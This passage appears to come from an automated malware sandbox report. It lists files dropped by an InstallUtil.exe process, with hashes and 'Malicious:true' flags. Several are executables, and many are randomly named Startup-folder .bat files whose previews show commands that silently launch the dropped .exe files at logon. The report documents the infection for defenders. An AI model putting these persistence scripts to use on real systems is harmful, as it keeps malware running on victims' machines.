                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):175104
                                                                                                                          Entropy (8bit):6.135102131058025
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:NgwOgWt4Ye0EQl4HpEQP0gflpnK9O3IC:OVtZEQepEQBpK9mX
                                                                                                                          MD5:89B400AF781E7D55812A77260DC1D9C8
                                                                                                                          SHA1:36A6D8C05D2B0C3BF32B677EBC01A57580A83C69
                                                                                                                          SHA-256:04E73AC7621BA31180A21AA5515F6E3455D40C7B6046CEEFA77ADADB45D5B33F
                                                                                                                          SHA-512:AEF229FAD4F8BDB5D7D9E4CAAAE708CC05618C2FCC534BB3F266AB60DBEB976C95D217190BBBB3BDBD121206CB4A5EA49939D3A546D7469330B36FA5F6F03711
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L......d............................}.............@..........................@.......0......................................|...(........x..............................................................................L............................text............................... ..`.rdata..>o.......p..................@..@.data...@.... ...(..................@....rsrc....x.......z...2..............@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\zWNPblMz8jR3viBabeOSPbWa.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2146090
                                                                                                                          Entropy (8bit):7.982011327302058
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:LnQx4yrQsuKCDVZrKLbCW0wuY3X/BvLwJBg:qUKLpuY3PBDwJ2
                                                                                                                          MD5:0D69DD3893505245669619A06840C2FE
                                                                                                                          SHA1:4B62A51FFB4E5355D61F95962DAD44A97936FDB6
                                                                                                                          SHA-256:CA6667D8CED30113270B5728D6B104DA781A682F194FDCB1BD85FA2CD446FE19
                                                                                                                          SHA-512:650D6AF9F670D8CF28D965E52EC2AD6CB4EB58543E21DA6F9A4E3B1F9B239696300958FF51FF378FE02ED6AA3781DD9B91D5B9EADC53AEDB7EC441F1FF1DFC74
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0aJ4M3BmSoFSfJVoorcfM8Tu.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.798776903948292
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5W8AwuVEoOgjczRyLAdm:fE1923WRgEc9yL
                                                                                                                          MD5:A699EACA4F99306D0614E5063FBA7DAD
                                                                                                                          SHA1:31CC176414DD6C53A0CE002C4B8F5BAC6DE7E60D
                                                                                                                          SHA-256:C1A993D88012F587BF1A244248E95D63E2B1A8C6965BB66F739BC21F39408A03
                                                                                                                          SHA-512:76CB7B6A16E7B2C645AAD1D488818533975B21AFD72632FB5C8A0E5C8376C9779B598F3D6118D462F429E6A6353139A94BC0C9DBFB9AD33FBD8BFCBBD3F952E1
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\s0seUKprDs1WGnkEHPu39VtW.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2qieftJz22U9uS3rPyIxFMCy.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.90808382472548
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5vbVhpb7E0s:fE1923xhVM
                                                                                                                          MD5:B4DF76C0489E3537C1A2D91EE6367D88
                                                                                                                          SHA1:F9CEF8131C28138CA8E1D737C718A1B58776204C
                                                                                                                          SHA-256:67B6477995FD8FECC40D878C1DF181796138DAFBB09DF03909A81E35AF269BF9
                                                                                                                          SHA-512:3EFF34F20B931006C7BD7F81EE3788ED423BB1BBD898A520E9A1E6AE1B389A5B76AB762D8C9D2939CA863D9C1671477E90F4DAF5017DBB6D56D8E389E3E7B4F5
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\JPkWbPiELiY3dVd0ezptZ3ko.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3GBEpW1FZQUrWvbMjKRmSlSD.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.852367617155621
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J59t8wWkYm:fE1923P8wWkP
                                                                                                                          MD5:B305CE8A067F711D4C4674EEB2C9CC32
                                                                                                                          SHA1:96A0753F39CFC23594EE2C66C5EC6CF47350924B
                                                                                                                          SHA-256:0985D2DFBCA27BC194CE563EBB8E3F116E168ED1AE4EF26F258D0E323271B226
                                                                                                                          SHA-512:91231D6FBA4E9F3F8127880EA13BC4110607399E5C3FCB792EC5E4EE7C8A2400D94772643B80ED9119D614CF7C2F2605D9FA15EF5035EBFAAB02FEF478057C18
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\XHapUUFNPyUhtn0ymqhPvOC6.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3bJmXHWxFTLdtjfcK2Eo1CEB.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):5.068728288980289
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5x2dIoUt:fE19230IoUt
                                                                                                                          MD5:708B7A006BA577A610568D98D86C6472
                                                                                                                          SHA1:CD9B8751305E7ACB88769FB333A73B907D8A339C
                                                                                                                          SHA-256:CFD9F6DCB29B6410F9A8AB159501BA3E809280CCCB94228AD06A722CB47904C1
                                                                                                                          SHA-512:78A422DDDB4AC2F1B294F377D7F12220965E1593747878C4E8BA802AFE304660DFDE3A77F26EB455C28A99287B64CA3C448E231968F9AF966FE84F1CE72AD181
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\TSj4lbXBm0ozR2JnFqSdYKyt.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3hhfUEZjih0hfMNE0tjXJNip.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.936057482154531
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5RgnEUi+OO4AHFn:fE1923LUi+THF
                                                                                                                          MD5:37684A1983194E7AEE976FC7FCE8E2CE
                                                                                                                          SHA1:FABD8A34C0973CA32BEA116F599D200563F8ED64
                                                                                                                          SHA-256:E0B48E199A095BD4126B20AB698197AC15C33BC0F53A11DEF0E85889CD57BE8F
                                                                                                                          SHA-512:C1F9B00FA0F264EE6D92205D46D05D1164C4235459AB9E09E279F4D06F9842EA2D08AB9548E896B52015FCE76A43277DE46EFF2361D7A313E0440327EB930178
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\tEoXnSB5a2gG0aMGbYjuRHfY.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4FESHHshWvY8UVRNyfERDlM3.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.91508703894938
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5uguxwS/qhwl:fE1923u6xW
                                                                                                                          MD5:15FB2817C1D4BA80E43C16C2AE7B74A0
                                                                                                                          SHA1:2C445FAB0C05CD1C6851348DA5DA444D35484690
                                                                                                                          SHA-256:68EFD489D994D05CF6DAC77545F4BF298F23FE56DF8B6E45539DF932851A9B6A
                                                                                                                          SHA-512:CE96C14E843FFB46F094CCFFFD17674F32C1D0F8DD5881A0BA5CADAC4F536603A4B940D61587130D514608F9C080C7D6386C2BA898ACB3B4A9AFDE5DED063A8B
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\KF9G3AcCbu7Zl4IuQK8qDucc.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4a9nVr9EEyQmaNt6aATX1FLT.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.9830140032660015
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5dRQ9yX8c3saBAsn:fE1923ToyX87aJ
                                                                                                                          MD5:B68F9BA8AC99C38E073AB63AFFB1BE99
                                                                                                                          SHA1:0FC6B8564780600DFAFEB0E92BBECB1D33634CC8
                                                                                                                          SHA-256:C83EB422A6E67F11A15FDF848D9EAEEDCC87C9B454B4BE773221DDB0EED7B9B8
                                                                                                                          SHA-512:9CCF7B64087B1D604F6452B6F0371BA4DDC230C081DF359FACA499D0A321D13E06B68F340789F4C7EFB5A04057882518BBCFF7FDA10900184AA218C1FC91DF0D
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\84uXgYSh2YRu2JRIl1mBIrr0.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5NnqgyNIFXV3fkGxjwFrvTVW.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.850343196440246
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J58jMUydBEnHIKm:fE19238s8o5
                                                                                                                          MD5:4DB964FBAFFE2833802FF6D823E37B26
                                                                                                                          SHA1:00E16CAC3A1DCA744088AA67315F8D3DA459B713
                                                                                                                          SHA-256:0A993B9679AEBB924600F306833B5E1F998303C565A0E082AD8A66677A4CF421
                                                                                                                          SHA-512:F62793167EB45A619313944497372468EE89544925B4B9DB67C8ABCFCEB42D313EE115F5C2889CCE5C9FC36A612FF85E9A1CF9F6BBDD7DD33A2D702825C0F502
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\YozXwrtOqW83cBaBYKUomag4.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7CPf1BbnKQFsIHTCUVgPW2b1.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.707855075711144
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5QwWx9R1eOvn:fE1923QwWZb
                                                                                                                          MD5:65941B1AC4A75B7A6B13D7178B0A2F34
                                                                                                                          SHA1:C4DC562F894144A78D2A0D8A6B25D2AE9759AD70
                                                                                                                          SHA-256:BA006F9547A96BA55F0C10829C47C43577E40F0244E9DCFEC210B9CE6557522B
                                                                                                                          SHA-512:CC23EF9E58FF546D4D8BB2C5C1159FDFC350C7C0BCB43FAC4B846657C010578FB97CCFC04108C29B0A5DE4DD91A0E439AC9E380C4EB77A49AA957E0CE1F5CD32
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\uUsTsPesltkS6XkccPV4r1be.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8pqQfoi3HoiRfRwXXSLOFIGm.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.90987949642652
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5c9Cmw1Fx+o4iFn:fE1923cM+oVF
                                                                                                                          MD5:68C56C302C0F7E13C441A2202413AA5C
                                                                                                                          SHA1:FF3765050BF25C2E3428B605FC13EBD7C1F66CD8
                                                                                                                          SHA-256:A8ED02A26297DCC5CB2F3B4E3FA38FD1D6B68459841B1490B6D25FB50C408F2F
                                                                                                                          SHA-512:4B9834D20914F3C98E2AAEE509199F39872296A9459A67E2DA86FBDFAD7157D179D86DBEA7F2DC6DC84DD13538391F8054C5E59DFCD4D606FAF2E2AFE15D7227
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\yXBgs4CMjv6Y3CFxbTDDkpre.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9uMffQzKGugRkIptYVRImTQz.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):91
                                                                                                                          Entropy (8bit):5.032642651654438
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5PclgoG3fRLQkdan:fE1923loGJLQD
                                                                                                                          MD5:A34A098FE510C9F271EAB9D9E464FF00
                                                                                                                          SHA1:453AD320A2E629722B1169A0834DB455CFC0E715
                                                                                                                          SHA-256:83303A4C62D814DF0F049C06F10A6BC6072C42F43A9AE5DDD7A0EE08CE2B4302
                                                                                                                          SHA-512:742C93E95F6B55DC7DBF0510BD78DBDF56B01939A42A9BDBAF71D00E67B54C39E51413285406F4D1D9A7BB985FD057E52B5F54411F431B43044BF6DC3652288C
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\j9oiPedoYJq65MrsMIBEWZ24.exe" --silent --allusers=0

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\A59bAABCemJp5R456KFjelzs.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.746880788794846
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5GILWNhLDiTyQUSBGLAdm:fE1923GIuLDiTu4m
                                                                                                                          MD5:C4970D8180C484770E50ADF0C481D6BD
                                                                                                                          SHA1:6EAE4D7F3C848258012EF2937F3D704AAEF54DF7
                                                                                                                          SHA-256:F2BF2D14055505B184F6400E9141AE1D3885C6F7FBB3F8726BD867E472C52415
                                                                                                                          SHA-512:D7525C16588E80800F80A4FE1912F78B385D6C86C721C48A0EA420A4DBCEAC7A662F0B346881958C470B7475C8845D1B4F1B2C0DE9E6F410C1A9BC10FAA0047E
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\cmnshDDu9usrWvW5qWukljAj.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CuVU21KjVTi8Wd9l97IXHCaJ.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.802227974236665
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5EOfdgws4l:fE1923EOqNe
                                                                                                                          MD5:2CB868E710AFDE2259E649B39EA037CC
                                                                                                                          SHA1:705122C6E995F5104FD92D7307C0FF920B213747
                                                                                                                          SHA-256:4C6B1D8181E5E4EAD622B9AA239DA6B7FDA1709F3E8289729D6EC9C356674A51
                                                                                                                          SHA-512:3DC91673CF262F494FF44636443E353C9AF7121D3F09DFAD334E987EFB04CD67201A56F9A7C0D6B57345EBB6D58456C1192673B4E022105B75E60490C4DCA9AD
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\arAAytPAHIBxEUE8lqY8jFUv.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DhFzVyJl1Qh3WRl61WvkIgtg.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.961445788918474
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5szvgPOgackm:fE1923s8GgaY
                                                                                                                          MD5:3D5EE83330FE7F48415E0DD9C29069B0
                                                                                                                          SHA1:9CBA0A69F16571A2CD27F529681ACF1E016980C5
                                                                                                                          SHA-256:C26ACFB5D234D1A8D57568B3976903B517CBFCEE4D45F9F48762622BBC7BCD1D
                                                                                                                          SHA-512:E0E81A665E8962AB47542E3536153475D37E186B3D8EECAD721000822D4E3D26C69EA65E679310DDFE9F9051F3223B9ACD4D29610D80187F9A535D5D827E0CD6
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\Imc6gJg8H4cjDDr1J0xEqhfy.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\E5vcf50a1xrNZPss2hqKnW2D.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.939877574570948
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5BckW7aNln:fE1923Pi4
                                                                                                                          MD5:17A04D31CA587B0E738260ED07E5DF1E
                                                                                                                          SHA1:2533EE5D4FD604914940BC32E59F45B14AAB4D73
                                                                                                                          SHA-256:4292D619DBC3600AC58CB7BB2E1EB16F6BAB83DC038E91517C4B022B75928A00
                                                                                                                          SHA-512:AE9A3E1715064EF34F981B1E5A7EE91753A4B04064215A18CB042FDB4E32C4CA175936BF829131C1A56570800BAE601CC6725DA043A71D0C5329EDAEDAE6A166
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\dyzUSu8swmONfKr10ailCBUT.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EXd58WGELkWeCynxgQPHUgBr.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):5.0331536461849575
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5CkNTcS51km:fE1923CkNTH6m
                                                                                                                          MD5:8553AA3A02388600D8175E4B455436A7
                                                                                                                          SHA1:70D6B6D5D5781A0895F3A5F5B9F7D9C0FFF0EFB5
                                                                                                                          SHA-256:7021AAF108DD41A3EB2EC8535770A431BF7D3218A205B40EDAF1D41C614C92EA
                                                                                                                          SHA-512:7D2FD08975CA95C8419B734D79C781D3F188ABA9BFFA06A88CF9E7FF5E0CCB164BCDA07EEF8A4E7802A1120005948046296F710C7B7CEE7BED3C0F5B133FD755
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\gJVExh69UXMYc2ZOtdjmxeSQ.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EnCs8E67uVG6Eqs33R0VMIaX.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.8527366392836635
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5113Gt1MmpBEFn:fE1923/3GFpeF
                                                                                                                          MD5:842D1340425F13D77D738552C964D55E
                                                                                                                          SHA1:C90F7948C3D1E51252F20E5A8A35C955ED2EB73C
                                                                                                                          SHA-256:B1CA80CD727DA14DA63D1B5BD6A58900CEDC2B59259863ABB9EB358712599C59
                                                                                                                          SHA-512:85ED3682BC29E1E79ADA230EC8F6E76E4F4B98E3986CE5A80D3305FD425AB2EDD48C4C84574C8869AAE30C42390AC822307385DB66D173AF84FFA12B9FADA407
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\PPRbCMR3JwR3Rpdv3d5rSgFs.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fbij73WE0HqnGHEPJLXCBbDZ.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.829372753235095
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5ptWt6t2wDKICln:fE1923DWgEwzs
                                                                                                                          MD5:93783DB88FEA91AC2857912FF489DAAB
                                                                                                                          SHA1:EB71D49F65CA806B2ABF3A1242279C9DA01DD8B7
                                                                                                                          SHA-256:992CC94C55EBBFA3493992EB5AC50F10D8AC533FD4017385D12155CA554047CA
                                                                                                                          SHA-512:FDF327A69C82CD3F565B750BEB60660AC9D5EB78F34C005E6F5E10F16652078D8E48DD6B175B71CDADEC050A04D5DD9C2C934E5FDF511BBCE003275B60B8A977
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\LHg0H4yHSfuTfUKbSoOyunge.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HSU3kmKANUWIev2Y6XGUJn4z.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):5.000801324663668
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5ic9dUBqUpyGAJFn:fE1923i+WBnyGMF
                                                                                                                          MD5:3C0227A4F0294611ED1CCFA39757B197
                                                                                                                          SHA1:2BE094D6AF256A29E1A74FFCE415EC54D0286315
                                                                                                                          SHA-256:13CA1340C7B5CD397D0050CFE37867F8FC24E5B16D1888818E21F56055498CD2
                                                                                                                          SHA-512:D832863869452AA8FAF6019263DECC24B01192C5D8DD80212D92A5A9D1B1A873C47C66CB80C87FBEE0C4D69CAB791E8E7E91FFB427F8DB40E7FC97506681060E
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\GGZyi81c9POTwLDASQoRqJGO.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hx0sIwDO9BmAGJHgVaGYhDQe.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.795224760012764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5QR+PCKMiYcL4iF:fE1923QReCUYcL
                                                                                                                          MD5:57D47B12D08BBDAD740567470AA242CE
                                                                                                                          SHA1:0100017E44AD1517CD16253948873BEF6F4D1453
                                                                                                                          SHA-256:CC6F16956D7688E1A0BC4EC3526086E4E4235FD4C17DB17685DF60A02C18514D
                                                                                                                          SHA-512:F08A5DC5AA971DF9F15A8F23B35F77658D4BDC6997512A3E92A16EA0A18F1E1D419A34F870751538E17A17EF2FF0470D59D5D3D5CC73092DD2315EB96F8FE5D3
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\5uaGL394o1URo4OLi5h5u5tB.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IN4MpOFfotqkxFDb9xG1KgQ4.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.947439360470673
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5uDrM0mzMA76ViF:fE1923ufMhMAZF
                                                                                                                          MD5:B732BEAE37783A302FCE19EF52215A68
                                                                                                                          SHA1:8590624C63CD8CD510EBDAF66EB9EBC7BD560B54
                                                                                                                          SHA-256:2749150342DB48F6BD7C74C5D5D372605CFB015FE9512D82C22BA3919A575D02
                                                                                                                          SHA-512:CC53A4363FD4492A11727D9BF191FCBF843F858EEF159F489B01ADAD3A2111C9EEA798FF0153DD38DFAB0C3C01DCDEF37F8B49D37CDB8E133A717341C91B31B7
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\Kf4hiHPq92VEGie04P7QtHUU.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IZ5Y7BJc8EYdvXcnIuceiXSu.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.884491189662577
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5mSOAvkmn:fE1923mrnm
                                                                                                                          MD5:0B54229399BB0A32C4D4BD7430FFA8DC
                                                                                                                          SHA1:80F158D5826103E72188618FA04E63E0936CA53C
                                                                                                                          SHA-256:D989D32A599094DA001581766892E1CBC3F7A343DF9FABBE61AB9133E156FF5E
                                                                                                                          SHA-512:579348905482A932EF99B015061AB4F3F57FB32727BE02BFF476EBF15FCA231902679C208D83E1098D162B0A5CCE75FE73199DC9316E182A506190CD5E703FA0
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\CZMrbdv3aANr0IrdmBiWfjaH.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JLskMOTKdJylvoD4fywb2xq9.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.896701946409339
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5f41G1czu13kiF:fE1923+z63JF
                                                                                                                          MD5:06A5C6C7F99A7EB0DC98461287BBEB46
